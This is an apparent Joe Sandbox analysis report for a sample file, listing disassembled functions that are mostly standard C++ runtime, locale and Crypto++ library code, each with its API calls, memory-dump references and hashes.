                                                                                                        • Instruction ID: d2a2b702121edaed219a7381d7cbdc663828ceb13bd8d00e7ed534ddfc405054
                                                                                                        • Opcode Fuzzy Hash: d84b568e78ac1d42b6a33eb0afa041990ad0e2210ee2fb8a36e068febd5da300
                                                                                                        • Instruction Fuzzy Hash: 11319571E006159BDB11DFA4DC81B5ABBA4FF05761F1442A9E918AB3A1DB715C04CB90
                                                                                                        Function 00B0E148 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00B0E18B
                                                                                                          • Part of subcall function 00B0F682: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00B0F6D1
                                                                                                        • GetCurrentThread.KERNEL32 ref: 00B0E195
                                                                                                        • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00B0E1A1
                                                                                                          • Part of subcall function 00B0303F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00B03051
                                                                                                          • Part of subcall function 00B034E6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00B034ED
                                                                                                        • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00B0E1E4
                                                                                                          • Part of subcall function 00B0F634: SetEvent.KERNEL32(?,?,00B0E1E9,00B0EF7D,00000000,?,00000000,00B0EF7D,00000004,00B0F629,?,00000000,?,?,00000000), ref: 00B0F678
                                                                                                        • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00B0E1ED
                                                                                                          • Part of subcall function 00B0EC63: __EH_prolog3.LIBCMT ref: 00B0EC6A
                                                                                                          • Part of subcall function 00B0EC63: List.LIBCONCRT ref: 00B0EC99
                                                                                                        • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00B0E1FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2908504212-0
                                                                                                        • Opcode ID: 010235c22700aa8934bd8f936e695dfefcd1e7dc525417b320223a86ab6ce00f
                                                                                                        • Instruction ID: 14dca3f3def4b3412b1ece0339fb8b649ad4dec0f175cd2e36ccfbb3f8993e2b
                                                                                                        • Opcode Fuzzy Hash: 010235c22700aa8934bd8f936e695dfefcd1e7dc525417b320223a86ab6ce00f
                                                                                                        • Instruction Fuzzy Hash: 05218C31500B159FCB25EF68C9908ABBBF9FF4C700700499DE452A76A1DB74F905CB91
                                                                                                        Function 00B1A268 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00B1A25F,00B17DFA,00B443DF,00000008,00B44737,?,?,?,?,00B14F23,?,?,AE695AF0), ref: 00B1A276
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B1A284
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B1A29D
                                                                                                        • SetLastError.KERNEL32(00000000,?,00B1A25F,00B17DFA,00B443DF,00000008,00B44737,?,?,?,?,00B14F23,?,?,AE695AF0), ref: 00B1A2EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: b4eaa43680ca8cb9cb889857c291ea7e604e6cea6f227dda6f33d56c0e2c9020
                                                                                                        • Instruction ID: bcb5b4ec6aee58f8fa24860fc0ba5c9e1f0c3bff50dd73c7c9574aa1cde001ac
                                                                                                        • Opcode Fuzzy Hash: b4eaa43680ca8cb9cb889857c291ea7e604e6cea6f227dda6f33d56c0e2c9020
                                                                                                        • Instruction Fuzzy Hash: 7901FC3251A3226E96247BB47C869BA27C5DB1177176003B9F514821F2EFB25CC09385
                                                                                                        Function 00AE57E4 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AE57EB
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE57F5
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • numpunct.LIBCPMT ref: 00AE582F
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE5846
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5866
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE5884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509942033-0
                                                                                                        • Opcode ID: af04e4fd5a9fb2b877bd58e39c7ba73e9485f20bb73ef563a3dc141c3d9e5b5a
                                                                                                        • Instruction ID: 330463be2f4a4fe4260fdae92f50c5fcb4f6b16816525583e2e1c3b2c6a96814
                                                                                                        • Opcode Fuzzy Hash: af04e4fd5a9fb2b877bd58e39c7ba73e9485f20bb73ef563a3dc141c3d9e5b5a
                                                                                                        • Instruction Fuzzy Hash: 55110E32D002548BCF05EBB9DD51BFE77B0AFA4724F284889E401AB2A1CF749E00CB90
                                                                                                        Function 00AF85F5 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF85FC
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8606
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • messages.LIBCPMT ref: 00AF8640
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8657
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8677
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8695
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                                                                                        • String ID:
                                                                                                        • API String ID: 438560357-0
                                                                                                        • Opcode ID: 8463a3412bcb61e9e029de546d52e12ccc1cd48c7cb1d397bc8d0c1da61305e6
                                                                                                        • Instruction ID: 37360988881c2d00c249b24ec7138099012cded015d966921c27aca5e61b5a07
                                                                                                        • Opcode Fuzzy Hash: 8463a3412bcb61e9e029de546d52e12ccc1cd48c7cb1d397bc8d0c1da61305e6
                                                                                                        • Instruction Fuzzy Hash: 6E11A0329002189BCF05EBE4DD55AFD77B5AF94710F644949F505AB2E1CF789E01CB90
                                                                                                        Function 00AF854F Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF8556
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8560
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • collate.LIBCPMT ref: 00AF859A
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF85B1
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF85D1
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF85EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2363045490-0
                                                                                                        • Opcode ID: dc0f1d01a08bc79baeb0bd97b4b9273949ceccaabb874a49dd9d4563a6c2f53a
                                                                                                        • Instruction ID: 947b74f62570a8a28df22ee2cf324ec5e9e295f0c97572f3c9fbaa60fb6ce54d
                                                                                                        • Opcode Fuzzy Hash: dc0f1d01a08bc79baeb0bd97b4b9273949ceccaabb874a49dd9d4563a6c2f53a
                                                                                                        • Instruction Fuzzy Hash: B41170329002289BCF05EBE4CD52AFD77B5AF98720F244449F5156B2A1CF789E01CB90
                                                                                                        Function 00AF87E7 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF87EE
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF87F8
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • moneypunct.LIBCPMT ref: 00AF8832
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8849
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8869
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8887
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 113178234-0
                                                                                                        • Opcode ID: e79197ba51d8abec18ee5801fd065ad069febf579dac3f4f5df2ad67d0a4a146
                                                                                                        • Instruction ID: 615317eebea0ae6cc3d380b8ba5451a1de7440952e752c740d2c1d55a1e812aa
                                                                                                        • Opcode Fuzzy Hash: e79197ba51d8abec18ee5801fd065ad069febf579dac3f4f5df2ad67d0a4a146
                                                                                                        • Instruction Fuzzy Hash: BC119A32D002589BCF05EBE4CD52AFD77B5AF94760F644449F601AB2A2CF789E01CB90
                                                                                                        Function 00AF888D Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF8894
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF889E
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • moneypunct.LIBCPMT ref: 00AF88D8
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF88EF
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF890F
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF892D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 113178234-0
                                                                                                        • Opcode ID: 595356d092817bc475926b8f327a67624172b9ee9102da10c62194845520e175
                                                                                                        • Instruction ID: 8344905767370cb0e18f5f81db76eff082618901e7be382bc75100baf3982a3f
                                                                                                        • Opcode Fuzzy Hash: 595356d092817bc475926b8f327a67624172b9ee9102da10c62194845520e175
                                                                                                        • Instruction Fuzzy Hash: 6D11A0329002189BCF05EBE4CD41AFE7BB4AF84714F244449F5016B2A1CF789E01CB91
                                                                                                        Function 00B3437A Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                        • _free.LIBCMT ref: 00B343B1
                                                                                                        • _free.LIBCMT ref: 00B343D9
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343E6
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                        • _abort.LIBCMT ref: 00B343F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: 617b9320017331cfbec2d4aa189fd47b35d12add3883ed0fed4f66d04d921da8
                                                                                                        • Instruction ID: 9283d5ec431845f136da668779f832452e30f445bfae1c9490a59cdaaef060f9
                                                                                                        • Opcode Fuzzy Hash: 617b9320017331cfbec2d4aa189fd47b35d12add3883ed0fed4f66d04d921da8
                                                                                                        • Instruction Fuzzy Hash: 05F0813610060167CB1273A96C4AB2F39EADBC2BA1F3501F5F514932A1EF24AD058529
                                                                                                        Function 00A75A93 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 252COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00A75B42
                                                                                                          • Part of subcall function 00B17BC4: ___unDName.LIBVCRUNTIME ref: 00B17BF0
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00A75BD4
                                                                                                          • Part of subcall function 00B17BC4: InterlockedPushEntrySList.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00B98810,', stored '), ref: 00B17C69
                                                                                                        Strings
                                                                                                        • ', stored ', xrefs: 00A75AF2
                                                                                                        • NameValuePairs: type mismatch for ', xrefs: 00A75AD2
                                                                                                        • ', trying to retrieve ', xrefs: 00A75B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name$EntryInterlockedListNamePush___un
                                                                                                        • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                                                                                                        • API String ID: 1061249770-3022120042
                                                                                                        • Opcode ID: 11ec801cc36e94b81d68681db7939f0782c8b27ff64176ce55c2f651240654b7
                                                                                                        • Instruction ID: cfa54f8be77b93a0e221462958119dbfc5590c4716f5488490d824734edca2b2
                                                                                                        • Opcode Fuzzy Hash: 11ec801cc36e94b81d68681db7939f0782c8b27ff64176ce55c2f651240654b7
                                                                                                        • Instruction Fuzzy Hash: DCA1B071D106488BEB19DF68CD8479EBBB1FF45304F14C29CE418AB392DBB99684CB90
                                                                                                        Function 00ABC940 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABCA08
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABCAC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                                                                                        • API String ID: 2005118841-4071778396
                                                                                                        • Opcode ID: 9e2452a1993e1e98b917f1f21a3813083bc285eef7fbb308e1ee82f4575c9ba5
                                                                                                        • Instruction ID: 0b39c354bbb32dd8a53554a231677ba6bfe6c2af3719f466f5f585164e8fbfa3
                                                                                                        • Opcode Fuzzy Hash: 9e2452a1993e1e98b917f1f21a3813083bc285eef7fbb308e1ee82f4575c9ba5
                                                                                                        • Instruction Fuzzy Hash: 69516D72544209AFCB14DF90CC41FEEBBB9FB18720F000969F902676A2DB71A914CBA0
                                                                                                        Function 00ABC760 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC804
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC8B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                        • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                                                                                        • API String ID: 3476068407-4071778396
                                                                                                        • Opcode ID: 217933fe6d487e686a48262ae7a77803edaee609ab678d11af6335e3200dc8cd
                                                                                                        • Instruction ID: 1a7c35323283fded1327b498b2d6c5e9a3eab49377ded8fd80b27e46704cfdbf
                                                                                                        • Opcode Fuzzy Hash: 217933fe6d487e686a48262ae7a77803edaee609ab678d11af6335e3200dc8cd
                                                                                                        • Instruction Fuzzy Hash: 37415275A44608AFCB14DFA4CC85FEEB7F8FB04724F1045A9E816A7691DB74B904CB90
                                                                                                        Function 00A76620 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A76690
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A766EE
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00A76742
                                                                                                        Strings
                                                                                                        • CryptoMaterial: this object contains invalid values, xrefs: 00A76667
                                                                                                        • CryptoMaterial: this object does not support precomputation, xrefs: 00A766C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$___std_exception_copy
